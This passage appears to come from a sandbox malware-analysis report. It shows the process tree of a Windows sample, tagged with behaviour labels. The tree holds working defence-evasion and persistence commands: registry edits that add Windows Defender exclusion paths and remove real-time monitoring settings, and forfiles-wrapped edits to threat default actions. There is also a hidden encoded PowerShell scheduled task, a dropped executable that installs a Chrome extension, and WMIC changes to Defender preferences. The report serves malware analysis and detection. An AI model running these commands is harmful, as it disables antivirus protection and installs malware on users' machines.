                                                                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              4⤵
                                                                                                                                              • Windows security bypass
                                                                                                                                              PID:608
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2460
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:1876
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:1956
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2288
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\lZLFnlfi\JVuTyPHhbJhYOpqk.wsf"
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1272
                                                                                                                                                • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                  wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\lZLFnlfi\JVuTyPHhbJhYOpqk.wsf"
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:340
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:952
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3948
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3288
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:4044
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3580
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2904
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3812
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3988
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:1860
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2004
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:4036
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:1772
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2960
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3644
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3992
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2664
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2068
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:1428
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1064
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3784
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1692
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                            PID:3928
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3152
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2448
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2688
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1872
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2460
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2236
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2964
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3272
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:952
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:932
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2604
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3060
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2784
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1796
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TN "gKIajALFd" /SC once /ST 17:02:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                PID:3844
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /run /I /tn "gKIajALFd"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1096
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "gKIajALFd"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4016
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:3824
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:2148
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3932
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:2288
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 21:11:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\zsmyIzQ.exe\" 9Z /QSkGdideU 385121 /S" /V1 /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                            PID:3052
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3704
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 304
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:952
                                                                                                                                                                                          • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\zsmyIzQ.exe
                                                                                                                                                                                            C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\zsmyIzQ.exe 9Z /QSkGdideU 385121 /S
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:1816
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:3688
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                PID:3192
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:988
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:3988
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                    PID:4040
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:1096
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:2372
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                        PID:4064
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:3592
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:592
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                          PID:1864
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:3392
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                              PID:2316
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3384
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    PID:3316
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:3752
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2640
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2864
                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:1692
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:2252
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        PID:1660
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
